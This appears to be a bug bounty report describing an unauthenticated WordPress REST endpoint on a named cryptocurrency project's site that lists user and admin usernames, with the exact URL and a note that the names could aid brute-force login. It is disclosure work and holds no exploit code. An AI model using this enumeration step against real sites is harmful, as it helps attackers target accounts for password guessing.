Information disclosure on Sifchain

## Summary: Hello Team, I have found user/admin usernames disclosed. Using REST API, we can see all the WordPress users/authors with some of their information. (such as id, name, login name, etc.) and employees of Sifchain without authentication on https://sifchain.finance/ ## Steps To Reproduce: You can find the information disclosure by going to the following URL (https://sifchain.finance/wp-json/wp/v2/users/) ## Supporting Material/References: 1) https://hackerone.com/reports/753725 2) https://hackerone.com/reports/138244 ## Impact 1) Malicious users could collect the usernames disclosed and be focused throughout BF (bruteforce) attack (as the usernames are now known), making it less harder to penetrate the systems. 2) Therefore this information can be used to do bruteforce login.